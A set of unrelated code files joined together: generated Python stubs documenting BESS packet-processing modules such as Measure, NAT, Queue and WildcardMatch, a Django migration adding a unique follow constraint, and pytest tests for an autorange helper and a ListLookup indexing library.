    The Measure module tracks latencies, packets per second, and other statistics.
    It should be paired with a Timestamp module, which attaches a timestamp to packets.
    The Measure module will log how long (in nanoseconds) it has been for each packet it received since it was timestamped.
    This module is somewhat experimental and undergoing various changes.
    There is a test for the Measure module in [`bessctl/module_tests/timestamp.py`](https://github.com/NetSys/bess/blob/master/bessctl/module_tests/timestamp.py).
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, offset=None, jitter_sample_prob=None, latency_ns_max=None, latency_ns_resolution=None):
        """
        The Measure module tracks latencies, packets per second, and other statistics.
        It should be paired with a Timestamp module, which attaches a timestamp to packets.
        The Measure module will log how long (in nanoseconds) it has been for each packet it received since it was timestamped.
        This module is somewhat experimental and undergoing various changes.
        There is a test for the Measure module in [`bessctl/module_tests/timestamp.py`](https://github.com/NetSys/bess/blob/master/bessctl/module_tests/timestamp.py).
        __Input Gates__: 1
        __Output Gates__: 1
        :param offset: int64 warmup = 1; /// removed: instead of warmup delay, user should Clear()
        / Where to store the current time within the packet, offset in bytes.
        :param jitter_sample_prob: How often the module should sample packets for inter-packet arrival measurements (to measure jitter).
        :param latency_ns_max: maximum latency expected, in ns (default 0.1 s)
        :param latency_ns_resolution: resolution, in ns (default 100)
        """
        pass
    def get_summary(self, clear=None, latency_percentiles=None, jitter_percentiles=None):
        """
        The Measure module measures and collects latency/jitter data for packets
        annotated by a Timestamp module. Note that the Timestamp and Measure modules must reside
        on the server for accurate measurement (as a result, the most typical use case is
        measuring roundtrip time).
        Optionally, you can also retrieve percentile values by specifying points in
        "percentiles". For example, "percentiles" of [50.0, 99.0] will return
        [median, 99'th %-ile tail latency] in "percentile_values_ns" in the response.
        :param clear: if true, the data will be all cleared after read
        :param latency_percentiles: ascending list of real numbers in [0.0, 100.0]
        :param jitter_percentiles: ascending list of real numbers in [0.0, 100.0]
        :return: The Measure module function `get_summary()` returns the following values.
        Note that the resolution value tells you how grainy the samples are,
        e.g., 100 means that anything from 0-99 ns counts as "0",
        anything from 100-199 counts as "100", and so on. The average
        is of samples using this graininess, but (being a result of division)
        may not be a multiple of the resolution.
        """
        pass
    def clear(self):
        # NOTE(review): auto-generated stub with no docstring; presumably
        # resets the collected statistics (cf. get_summary's `clear` flag) --
        # confirm against module_msg.proto.
        pass
class Merge(Module):
    """
    All input gates go out of a single output gate
    The merge module takes no parameters. It has multiple input gates,
    and passes out all packets from a single output gate.
    __Input Gates__: many (configurable)
    __Output Gates__: 1
    """
    def __init__(self):
        """
        The merge module takes no parameters. It has multiple input gates,
        and passes out all packets from a single output gate.
        __Input Gates__: many (configurable)
        __Output Gates__: 1
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class MetadataTest(Module):
    """
    Dynamic metadata test module
    The MetadataTest module is used for internal testing purposes.
    """
    def __init__(self, read=None, write=None, update=None):
        """
        The MetadataTest module is used for internal testing purposes.
        :param read: metadata attributes to read -- exact schema not documented here; see BESS proto definitions
        :param write: metadata attributes to write -- exact schema not documented here; see BESS proto definitions
        :param update: metadata attributes to update -- exact schema not documented here; see BESS proto definitions
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class NAT(Module):
    """
    Dynamic Network address/port translator
    The NAT module implements Dynamic IPv4 address/port translation,
    rewriting packet source addresses with external addresses as specified,
    and destination addresses for packets on the reverse direction.
    L3/L4 checksums are updated correspondingly.
    To see an example of NAT in use, see:
    [`bess/bessctl/conf/samples/nat.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/nat.bess)
    Currently only supports TCP/UDP/ICMP.
    Note that address/port in packet payload (e.g., FTP) are NOT translated.
    __Input Gates__: 2 (0 for internal->external, and 1 for external->internal direction)
    __Output Gates__: 2 (same as the input gate)
    """
    def __init__(self, ext_addrs=None):
        """
        The NAT module implements Dynamic IPv4 address/port translation,
        rewriting packet source addresses with external addresses as specified,
        and destination addresses for packets on the reverse direction.
        L3/L4 checksums are updated correspondingly.
        To see an example of NAT in use, see:
        [`bess/bessctl/conf/samples/nat.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/nat.bess)
        Currently only supports TCP/UDP/ICMP.
        Note that address/port in packet payload (e.g., FTP) are NOT translated.
        __Input Gates__: 2 (0 for internal->external, and 1 for external->internal direction)
        __Output Gates__: 2 (same as the input gate)
        :param ext_addrs: list of external IP addresses
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def get_initial_arg(self):
        # Generated stub: returns the module's construction-time argument.
        pass
    def get_runtime_config(self):
        # Generated stub: returns the module's current runtime configuration.
        pass
    def set_runtime_config(self):
        # Generated stub: replaces the module's current runtime configuration.
        pass
class NoOP(Module):
    """
    creates a task that does nothing
    This module is used for testing purposes.
    """
    def __init__(self):
        """
        This module is used for testing purposes.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class PortInc(Module):
    """
    receives packets from a port
    The PortInc module connects a physical or virtual port and releases
    packets from it. PortInc does not support multiqueueing.
    For details on how to configure PortInc using DPDK, virtual ports,
    or libpcap, see the sidebar in the wiki.
    __Input Gates__: 0
    __Output Gates__: 1
    """
    def __init__(self, port=None, prefetch=None):
        """
        The PortInc module connects a physical or virtual port and releases
        packets from it. PortInc does not support multiqueueing.
        For details on how to configure PortInc using DPDK, virtual ports,
        or libpcap, see the sidebar in the wiki.
        __Input Gates__: 0
        __Output Gates__: 1
        :param port: The portname to connect to.
        :param prefetch: Whether or not to prefetch packets from the port.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def set_burst(self, burst=None):
        """
        The module PortInc has a function `set_burst(...)` that allows you to specify the
        maximum number of packets to be stored in a single PacketBatch released by
        the module.
        :param burst: The maximum "burst" of packets (ie, the maximum batch size)
        """
        pass
class PortOut(Module):
    """
    sends packets to a port
    The PortOut module connects to a physical or virtual port and pushes
    packets to it. For details on how to configure PortOut with DPDK,
    virtual ports, libpcap, etc, see the sidebar in the wiki.
    __Input Gates__: 1
    __Output Gates__: 0
    """
    def __init__(self, port=None):
        """
        The PortOut module connects to a physical or virtual port and pushes
        packets to it. For details on how to configure PortOut with DPDK,
        virtual ports, libpcap, etc, see the sidebar in the wiki.
        __Input Gates__: 1
        __Output Gates__: 0
        :param port: The portname to connect to.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class Queue(Module):
    """
    terminates current task and enqueue packets for new task
    The Queue module implements a simple packet queue.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, size=None, prefetch=None, backpressure=None):
        """
        The Queue module implements a simple packet queue.
        __Input Gates__: 1
        __Output Gates__: 1
        :param size: The maximum number of packets to store in the queue.
        :param prefetch: When prefetch is enabled, the module will perform CPU prefetch on the first 64B of each packet onto CPU L1 cache. Default value is false.
        :param backpressure: When backpressure is enabled, the module will notify upstream if it is overloaded.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def set_burst(self, burst=None):
        """
        The module Queue has a function `set_burst(...)` that allows you to specify
        the maximum number of packets to be stored in a single PacketBatch released
        by the module.
        :param burst: The maximum "burst" of packets (ie, the maximum batch size)
        """
        pass
    def set_size(self, size=None):
        """
        The module Queue has a function `set_size(...)` that allows specifying the
        size of the queue in total number of packets.
        :param size: The maximum number of packets to store in the queue.
        """
        pass
    def get_status(self):
        """
        Modules that are queues or contain queues may contain functions
        `get_status()` that return QueueCommandGetStatusResponse.
        :return: Modules that are queues or contain queues may contain functions
            `get_status()` that take no parameters and returns the queue occupancy and
            size.
        """
        pass
class QueueInc(Module):
    """
    receives packets from a port via a specific queue
    The module QueueInc produces input packets from a physical or virtual port.
    Unlike PortInc, it supports multiqueue ports.
    For details on how to configure QueueInc with DPDK, virtual ports,
    libpcap, etc, see the sidebar in the wiki.
    __Input Gates__: 0
    __Output Gates__: 1
    """
    def __init__(self, port=None, qid=None, prefetch=None):
        """
        The module QueueInc produces input packets from a physical or virtual port.
        Unlike PortInc, it supports multiqueue ports.
        For details on how to configure QueueInc with DPDK, virtual ports,
        libpcap, etc, see the sidebar in the wiki.
        __Input Gates__: 0
        __Output Gates__: 1
        :param port: The portname to connect to (read from).
        :param qid: The queue on that port to read from. qid starts from 0.
        :param prefetch: When prefetch is enabled, the module will perform CPU prefetch on the first 64B of each packet onto CPU L1 cache. Default value is false.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def set_burst(self, burst=None):
        """
        The module QueueInc has a function `set_burst(...)` that allows you to specify
        the maximum number of packets to be stored in a single PacketBatch released
        by the module.
        :param burst: The maximum "burst" of packets (ie, the maximum batch size)
        """
        pass
class QueueOut(Module):
    """
    sends packets to a port via a specific queue
    The QueueOut module releases packets to a physical or virtual port.
    Unlike PortOut, it supports multiqueue ports.
    For details on how to configure QueueOut with DPDK, virtual ports,
    libpcap, etc, see the sidebar in the wiki.
    __Input Gates__: 1
    __Output Gates__: 0
    """
    def __init__(self, port=None, qid=None):
        """
        The QueueOut module releases packets to a physical or virtual port.
        Unlike PortOut, it supports multiqueue ports.
        For details on how to configure QueueOut with DPDK, virtual ports,
        libpcap, etc, see the sidebar in the wiki.
        __Input Gates__: 1
        __Output Gates__: 0
        :param port: The portname to connect to.
        :param qid: The queue on that port to write out to.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class RandomSplit(Module):
    """
    randomly splits/drops packets
    The RandomSplit module randomly splits/drops packets
    __Input Gates__: 1
    __Output Gates__: many (configurable)
    """
    def __init__(self, drop_rate=None, gates=None):
        """
        The RandomSplit module randomly splits/drops packets
        __Input Gates__: 1
        __Output Gates__: many (configurable)
        :param drop_rate: Probability of dropping packet.
        :param gates: A list of gate numbers to split the traffic.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def set_droprate(self, drop_rate=None):
        """
        The RandomSplit module has a function `set_droprate(...)` which specifies
        the probability of dropping packets
        :param drop_rate: Probability of dropping packet.
        """
        pass
    def set_gates(self, gates=None):
        """
        The RandomSplit module has a function `set_gates(...)` which changes
        the total number of output gates in the module.
        :param gates: A list of gate numbers to split the traffic.
        """
        pass
class RandomUpdate(Module):
    """
    updates packet data with random values
    The RandomUpdate module rewrites a specified field (`offset` and `size`) in a packet
    with a random value between a specified min and max values.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, fields=None):
        """
        The RandomUpdate module rewrites a specified field (`offset` and `size`) in a packet
        with a random value between a specified min and max values.
        __Input Gates__: 1
        __Output Gates__: 1
        :param fields: A list of Random Update Fields.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def add(self, fields=None):
        """
        The RandomUpdate module rewrites a specified field (`offset` and `size`) in a packet
        with a random value between a specified min and max values.
        __Input Gates__: 1
        __Output Gates__: 1
        :param fields: A list of Random Update Fields.
        """
        pass
    def clear(self):
        """
        The function `clear()` for RandomUpdate takes no parameters and clears all
        state in the module.
        """
        pass
class Replicate(Module):
    """
    makes a copy of a packet and sends it out over n gates
    The Replicate module makes copies of a packet sending one copy out over each
    of n output gates.
    __Input Gates__: 1
    __Output Gates__: many (configurable)
    """
    def __init__(self, gates=None):
        """
        The Replicate module makes copies of a packet sending one copy out over each
        of n output gates.
        __Input Gates__: 1
        __Output Gates__: many (configurable)
        :param gates: A list of gate numbers to send packet copies to.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def set_gates(self, gates=None):
        """
        The Replicate module has a function `set_gates(...)` which changes
        the total number of output gates in the module.
        :param gates: A list of gate numbers to replicate the traffic over.
        """
        pass
class Rewrite(Module):
    """
    replaces entire packet data
    The Rewrite module replaces an entire packet body with a packet "template"
    converting all packets that pass through to copies of one of
    the templates.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, templates=None):
        """
        The Rewrite module replaces an entire packet body with a packet "template"
        converting all packets that pass through to copies of one of
        the templates.
        __Input Gates__: 1
        __Output Gates__: 1
        :param templates: A list of bytestrings representing packet templates.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def add(self, templates=None):
        """
        The Rewrite module replaces an entire packet body with a packet "template"
        converting all packets that pass through to copies of one of
        the templates.
        __Input Gates__: 1
        __Output Gates__: 1
        :param templates: A list of bytestrings representing packet templates.
        """
        pass
    def clear(self):
        """
        The function `clear()` for Rewrite takes no parameters and clears all state
        in the module.
        """
        pass
class RoundRobin(Module):
    """
    splits packets evenly with round robin
    The RoundRobin module splits packets from one input gate across multiple output
    gates.
    __Input Gates__: 1
    __Output Gates__: many (configurable)
    """
    def __init__(self, gates=None, mode=None):
        """
        The RoundRobin module splits packets from one input gate across multiple output
        gates.
        __Input Gates__: 1
        __Output Gates__: many (configurable)
        :param gates: A list of gate numbers to split packets across.
        :param mode: Whether to split across gate with every `'packet'` or every `'batch'`.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def set_mode(self, mode=None):
        """
        The RoundRobin module has a function `set_mode(...)` which specifies whether
        to balance traffic across gates per-packet or per-batch.
        :param mode: whether to perform `'packet'` or `'batch'` round robin partitioning.
        """
        pass
    def set_gates(self, gates=None):
        """
        The RoundRobin module has a function `set_gates(...)` which changes
        the total number of output gates in the module.
        :param gates: A list of gate numbers to round-robin the traffic over.
        """
        pass
class SetMetadata(Module):
    """
    Set metadata attributes to packets
    The SetMetadata module adds metadata attributes to packets, which are not stored
    or sent out with packet data. For examples of SetMetadata use, see
    [`bess/bessctl/conf/attr_match.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/metadata/attr_match.bess)
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, attrs=None):
        """
        The SetMetadata module adds metadata attributes to packets, which are not stored
        or sent out with packet data. For examples of SetMetadata use, see
        [`bess/bessctl/conf/attr_match.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/metadata/attr_match.bess)
        __Input Gates__: 1
        __Output Gates__: 1
        :param attrs: A list of attributes to attach to the packet.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class Sink(Module):
    """
    discards all packets
    The sink module drops all packets that are sent to it.
    __Input Gates__: 1
    __Output Gates__: 0
    """
    def __init__(self):
        """
        The sink module drops all packets that are sent to it.
        __Input Gates__: 1
        __Output Gates__: 0
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class Source(Module):
    """
    infinitely generates packets with uninitialized data
    The Source module generates packets with no payload contents.
    __Input Gates__: 0
    __Output Gates__: 1
    """
    def __init__(self, pkt_size=None):
        """
        The Source module generates packets with no payload contents.
        __Input Gates__: 0
        __Output Gates__: 1
        :param pkt_size: The size (in bytes) of packet data to produce.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def set_pkt_size(self, pkt_size=None):
        """
        The Source module has a function `set_pkt_size(...)` which specifies the size
        of packets to be produced by the Source module.
        :param pkt_size: The size (in bytes) of the packets for Source to create.
        """
        pass
    def set_burst(self, burst=None):
        """
        The Source module has a function `set_burst(...)` which
        specifies the maximum number of packets to release in a single packetbatch
        from the module.
        :param burst: The maximum number of packets to release in a packetbatch from the module.
        """
        pass
class Split(Module):
    """
    split packets depending on packet data or metadata attributes
    The Split module is a basic classifier which directs packets out a gate
    based on data in the packet (e.g., if the read in value is 3, the packet
    is directed out output gate 3).
    __Input Gates__: 1
    __Output Gates__: many (up to 2^(size * 8))
    """
    def __init__(self, size=None, attribute=None, offset=None):
        """
        The Split module is a basic classifier which directs packets out a gate
        based on data in the packet (e.g., if the read in value is 3, the packet
        is directed out output gate 3).
        __Input Gates__: 1
        __Output Gates__: many (up to 2^(size * 8))
        :param size: The size of the value to read in bytes
        :param attribute: The name of the metadata field to read.
        :param offset: The offset (in bytes) of the data field to read.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class StaticNAT(Module):
    """
    Static network address translator
    Static NAT module implements one-to-one translation of source/destination
    IPv4 addresses. No port number is translated.
    L3/L4 checksums are updated correspondingly.
    To see an example of NAT in use, see:
    [`bess/bessctl/conf/samples/nat.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/nat.bess)
    Forward direction (from input gate 0 to output gate 0):
    - Source IP address is updated, from internal to external address.
    Reverse direction (from input gate 1 to output gate 1):
    - Destination IP address is updated, from external to internal address.
    If the original address is outside any of the ranges, packets are forwarded
    without NAT.
    Note that address in packet payload (e.g., FTP) are NOT translated.
    __Input Gates__: 2 (0 for internal->external, and 1 for external->internal direction)
    __Output Gates__: 2 (same as the input gate)
    """
    def __init__(self, pairs=None):
        """
        Static NAT module implements one-to-one translation of source/destination
        IPv4 addresses. No port number is translated.
        L3/L4 checksums are updated correspondingly.
        To see an example of NAT in use, see:
        [`bess/bessctl/conf/samples/nat.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/nat.bess)
        Forward direction (from input gate 0 to output gate 0):
        - Source IP address is updated, from internal to external address.
        Reverse direction (from input gate 1 to output gate 1):
        - Destination IP address is updated, from external to internal address.
        If the original address is outside any of the ranges, packets are forwarded
        without NAT.
        Note that address in packet payload (e.g., FTP) are NOT translated.
        __Input Gates__: 2 (0 for internal->external, and 1 for external->internal direction)
        __Output Gates__: 2 (same as the input gate)
        :param pairs: the internal/external address pairs to translate between -- see BESS proto definitions
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def get_initial_arg(self):
        # Generated stub: returns the module's construction-time argument.
        pass
    def get_runtime_config(self):
        # Generated stub: returns the module's current runtime configuration.
        pass
    def set_runtime_config(self):
        # Generated stub: replaces the module's current runtime configuration.
        pass
class Timestamp(Module):
    """
    marks current time to packets (paired with Measure module)
    The timestamp module takes an offset parameter. It inserts the current
    time in nanoseconds into the packet, to be used for latency measurements
    alongside the Measure module. The default offset is after an IPv4 UDP
    header.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, offset=None):
        """
        The timestamp module takes an offset parameter. It inserts the current
        time in nanoseconds into the packet, to be used for latency measurements
        alongside the Measure module. The default offset is after an IPv4 UDP
        header.
        __Input Gates__: 1
        __Output Gates__: 1
        :param offset: byte offset in the packet where the timestamp is written
            (defaults to just after an IPv4 UDP header).
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class Update(Module):
    """
    updates packet data with specified values
    The Update module rewrites a field in a packet's data with a specific value.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, fields=None):
        """
        The Update module rewrites a field in a packet's data with a specific value.
        __Input Gates__: 1
        __Output Gates__: 1
        :param fields: A list of Update Fields.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def add(self, fields=None):
        """
        The Update module rewrites a field in a packet's data with a specific value.
        __Input Gates__: 1
        __Output Gates__: 1
        :param fields: A list of Update Fields.
        """
        pass
    def clear(self):
        """
        The function `clear()` for Update takes no parameters and clears all state in
        the module.
        """
        pass
class UpdateTTL(Module):
    """
    decreases the IP TTL field by 1
    """
    # No configuration commands are generated for this module.
class UrlFilter(Module):
    """
    Filter HTTP connection
    The URLFilter performs TCP reconstruction over a flow and blocks
    connections which mention a banned URL.
    __Input Gates__: 2
    __Output Gates__: 2
    Note that the add() command takes this same argument, and the
    clear() command takes an empty argument.
    """
    def __init__(self, blacklist=None):
        """
        The URLFilter performs TCP reconstruction over a flow and blocks
        connections which mention a banned URL.
        __Input Gates__: 2
        __Output Gates__: 2
        Note that the add() command takes this same argument, and the
        clear() command takes an empty argument.
        :param blacklist: A list of Urls to block.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def get_initial_arg(self):
        # Generated stub: returns the module's construction-time argument.
        pass
    def get_runtime_config(self):
        # Generated stub: returns the module's current runtime configuration.
        pass
    def set_runtime_config(self, blacklist=None):
        """
        The runtime configuration of a URLFilter is the current
        blacklist. This means that getting the Arg gets an *empty*
        list: we assume anyone using get_initial_arg is also using
        get_runtime_config.
        :param blacklist: the new blacklist to install as the runtime configuration.
        :return: The runtime configuration of a URLFilter is the current
            blacklist. This means that getting the Arg gets an *empty*
            list: we assume anyone using get_initial_arg is also using
            get_runtime_config.
        """
        pass
    def add(self, blacklist=None):
        """
        The URLFilter performs TCP reconstruction over a flow and blocks
        connections which mention a banned URL.
        __Input Gates__: 2
        __Output Gates__: 2
        Note that the add() command takes this same argument, and the
        clear() command takes an empty argument.
        :param blacklist: A list of Urls to block.
        """
        pass
    def clear(self):
        # Generated stub: clears the installed blacklist (takes an empty argument).
        pass
class VLANPop(Module):
    """
    removes 802.1Q/802.11ad VLAN tag
    VLANPop removes the VLAN tag.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self):
        """
        VLANPop removes the VLAN tag.
        __Input Gates__: 1
        __Output Gates__: 1
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class VLANPush(Module):
    """
    adds 802.1Q/802.11ad VLAN tag
    VLANPush appends a VLAN tag with a specified TCI value.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, tci=None):
        """
        VLANPush appends a VLAN tag with a specified TCI value.
        __Input Gates__: 1
        __Output Gates__: 1
        :param tci: The TCI value to insert in the VLAN tag.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def set_tci(self, tci=None):
        """
        VLANPush appends a VLAN tag with a specified TCI value.
        __Input Gates__: 1
        __Output Gates__: 1
        :param tci: The TCI value to insert in the VLAN tag.
        """
        pass
class VLANSplit(Module):
    """
    split packets depending on their VID
    Splits packets across output gates according to VLAN id (e.g., id 3 goes out gate 3).
    __Input Gates__: 1
    __Output Gates__: many
    """
    def __init__(self):
        """
        Splits packets across output gates according to VLAN id (e.g., id 3 goes out gate 3).
        __Input Gates__: 1
        __Output Gates__: many
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class VXLANDecap(Module):
    """
    decapsulates the outer Ethernet/IP/UDP/VXLAN headers
    VXLANDecap module decapsulates a VXLAN header on a packet.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self):
        """
        VXLANDecap module decapsulates a VXLAN header on a packet.
        __Input Gates__: 1
        __Output Gates__: 1
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class VXLANEncap(Module):
    """
    encapsulates packets with UDP/VXLAN headers
    VXLANEncap module wraps a packet in a VXLAN header with a specified destination port.
    __Input Gates__: 1
    __Output Gates__: 1
    """
    def __init__(self, dstport=None):
        """
        VXLANEncap module wraps a packet in a VXLAN header with a specified destination port.
        __Input Gates__: 1
        __Output Gates__: 1
        :param dstport: The destination UDP port
        """
        pass  # generated stub; the module's real logic is implemented outside this file
class WildcardMatch(Module):
    """
    Multi-field classifier with a wildcard match table
    The WildcardMatch module matches over multiple fields in a packet and
    pushes packets that do match out a specified gate, and those that don't out a default
    gate. WildcardMatch is initialized with the fields it should inspect over,
    rules are added via the `add(...)` function.
    An example of WildcardMatch is in [`bess/bessctl/conf/samples/wildcardmatch.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/wildcardmatch.bess)
    __Input Gates__: 1
    __Output Gates__: many (configurable)
    """
    def __init__(self, fields=None):
        """
        The WildcardMatch module matches over multiple fields in a packet and
        pushes packets that do match out a specified gate, and those that don't out a default
        gate. WildcardMatch is initialized with the fields it should inspect over,
        rules are added via the `add(...)` function.
        An example of WildcardMatch is in [`bess/bessctl/conf/samples/wildcardmatch.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/wildcardmatch.bess)
        __Input Gates__: 1
        __Output Gates__: many (configurable)
        :param fields: A list of WildcardMatch fields.
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def get_initial_arg(self):
        # Generated stub: returns the module's construction-time argument.
        pass
    def get_runtime_config(self):
        # Generated stub: returns the module's current runtime configuration.
        pass
    def set_runtime_config(self, default_gate=None, rules=None):
        """
        WildcardMatchConfig represents the current runtime configuration
        of a WildcardMatch module, as returned by get_runtime_config and
        set by set_runtime_config.
        :param default_gate: the gate for traffic that matches no rule.
        :param rules: the full rule set to install.
        :return: WildcardMatchConfig represents the current runtime configuration
            of a WildcardMatch module, as returned by get_runtime_config and
            set by set_runtime_config.
        """
        pass
    def add(self, gate=None, priority=None, values=None, masks=None):
        """
        The module WildcardMatch has a command `add(...)` which inserts a new rule
        into the WildcardMatch module. For an example of code using WildcardMatch see
        `bess/bessctl/conf/samples/wildcardmatch.bess`.
        :param gate: Traffic matching this new rule will be sent to this gate.
        :param priority: If a packet matches multiple rules, the rule with higher priority will be applied. If priorities are equal behavior is undefined.
        :param values: The values to check for in each field.
        :param masks: The bitmask for each field -- set `0x0` to ignore the field altogether.
        """
        pass
    def delete(self, values=None, masks=None):
        """
        The module WildcardMatch has a command `delete(...)` which removes a rule -- simply specify the values and masks from the previously inserted rule to remove them.
        :param values: The values being checked for in the rule
        :param masks: The bitmask from the rule.
        """
        pass
    def clear(self):
        """
        The function `clear()` for WildcardMatch takes no parameters, it clears
        all state in the WildcardMatch module (is equivalent to calling delete for all rules)
        """
        pass
    def set_default_gate(self, gate=None):
        """
        For traffic which does not match any rule in the WildcardMatch module,
        the `set_default_gate(...)` function specifies which gate to send this extra traffic to.
        :param gate: the gate number for unmatched traffic.
        """
        pass
class WorkerSplit(Module):
    """
    send packets to output gate X, the id of current worker
    WorkerSplit splits packets based on the worker calling ProcessBatch(). It has
    two modes.
    1) Packets from worker `x` are mapped to output gate `x`. This is the default
    mode.
    2) When the `worker_gates` field is set, packets from a worker `x` are mapped
    to `worker_gates[x]`. In this mode, packet batches from workers not
    mapped to an output gate will be dropped.
    Calling the `reset` command with an empty `worker_gates` field will revert
    WorkerSplit to the default mode.
    __Input Gates__: 1
    __Output Gates__: many
    """
    def __init__(self, worker_gates=None):
        """
        WorkerSplit splits packets based on the worker calling ProcessBatch(). It has
        two modes.
        1) Packets from worker `x` are mapped to output gate `x`. This is the default
        mode.
        2) When the `worker_gates` field is set, packets from a worker `x` are mapped
        to `worker_gates[x]`. In this mode, packet batches from workers not
        mapped to an output gate will be dropped.
        Calling the `reset` command with an empty `worker_gates` field will revert
        WorkerSplit to the default mode.
        __Input Gates__: 1
        __Output Gates__: many
        :param worker_gates: ogate -> worker mask
        """
        pass  # generated stub; the module's real logic is implemented outside this file
    def reset(self, worker_gates=None):
        """
        WorkerSplit splits packets based on the worker calling ProcessBatch(). It has
        two modes.
        1) Packets from worker `x` are mapped to output gate `x`. This is the default
        mode.
        2) When the `worker_gates` field is set, packets from a worker `x` are mapped
        to `worker_gates[x]`. In this mode, packet batches from workers not
        mapped to an output gate will be dropped.
        Calling the `reset` command with an empty `worker_gates` field will revert
        WorkerSplit to the default mode.
        __Input Gates__: 1
        __Output Gates__: many
        :param worker_gates: ogate -> worker mask
        """
        pass
| 62,843 | 19,117 |
# Generated by Django 2.2.9 on 2020-11-20 02:29
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a DB-level unique constraint on Follow(user, author) so a user
    cannot follow the same author more than once."""

    dependencies = [
        ('posts', '0009_auto_20201115_0431'),
    ]
    operations = [
        migrations.AddConstraint(
            model_name='follow',
            constraint=models.UniqueConstraint(fields=('user', 'author'), name='following_unique'),
        ),
    ]
| 409 | 144 |
import pytest
from disterminal import helpers
import numpy as np
def main_call(x):
    """Return a zero array shaped like ``x`` with 0.1 at indices 1 and -1.

    Used as a toy signal for exercising helpers.autorange below.
    """
    result = np.zeros(x.shape)
    result[1] = result[-1] = 0.1
    return result
def test_autorange():
    # autorange should search for a symmetric x-range wide enough to capture
    # the non-zero samples that main_call places at indices 1 and -1.
    # NOTE(review): the expected bounds of +/-9999.95 and the 100-sample grid
    # come from autorange's internal search -- confirm against
    # disterminal.helpers.autorange if this assertion ever drifts.
    x = helpers.autorange(main_call, '')
    assert x.shape == (100,)
    assert x.min() == pytest.approx(-9999.95)
    assert x.max() == pytest.approx(9999.95)
| 350 | 148 |
import pytest
from listlookup import ListLookup
# Shared fixture data: city records that the tests below index and look up.
sample_list = [
    {"id": 1, "country": "us", "name": "Atlanta"},
    {"id": 2, "country": "us", "name": "Miami"},
    {"id": 3, "country": "uk", "name": "Britain"},
    {"id": 5, "country": "uk", "name": "Bermingham"},
    {"id": 4, "country": "ca", "name": "Barrie"},
]
def test_lookups():
    # Basic lookups against a unique "id" index and a non-unique "country"
    # index, with and without preserve_order, including a no-match case.
    cities = ListLookup(sample_list)
    cities.index("id", lambda d: d['id'], unique=True)
    cities.index("country", lambda d: d['country'])
    assert list(cities.lookup(id=1, preserve_order=True)) == [
        {"id": 1, "country": "us", "name": "Atlanta"}
    ]
    assert list(cities.lookup(id=1, country="us", preserve_order=False)) == [
        {"id": 1, "country": "us", "name": "Atlanta"}
    ]
    assert list(cities.lookup(country="us", preserve_order=True)) == [
        {"id": 1, "country": "us", "name": "Atlanta"},
        {"id": 2, "country": "us", "name": "Miami"}
    ]
    # id=2 is "us", so combining it with country="uk" must yield nothing.
    assert list(cities.lookup(id=2, country="uk")) == []
def test_callable_lookup():
    # A lookup value may be a predicate; it should only be invoked for
    # candidates that survived the other index filters (here: 2 "uk" names).
    cities = ListLookup(sample_list)
    cities.index('country', lambda d: d['country'])
    cities.index('name', lambda d: d['name'])
    callback_call_count = 0
    def lookup_starts_with(v):
        nonlocal callback_call_count
        callback_call_count += 1
        return v.startswith('B')
    result = list(cities.lookup(country='uk', name=lookup_starts_with))
    assert len(result) == 2
    assert result[0]['name'].startswith('B')
    assert result[1]['name'].startswith('B')
    # Both "uk" index keys ("Britain", "Bermingham") were tested exactly once.
    assert callback_call_count == 2
def test_index_multiple():
    # multiple=True lets one record register several index keys; lookups by
    # any of the derived keys (e.g. "uk_a", "2Bermingham") find the record.
    cities = ListLookup(sample_list)
    cities.index('country', lambda d: [d['country'], "%s_a" % d['country'], "%s_b" % d['country']], multiple=True)
    cities.index('name', lambda d: [d['name'], "1%s" % d['name'], "2%s" % d['name']], multiple=True)
    result = list(cities.lookup(country='uk', name=lambda term: term.startswith('B')))
    assert len(result) == 2
    assert result[0]['name'].startswith('B')
    assert result[1]['name'].startswith('B')
    result = list(cities.lookup(country='uk_a', name="2Bermingham"))
    assert len(result) == 1
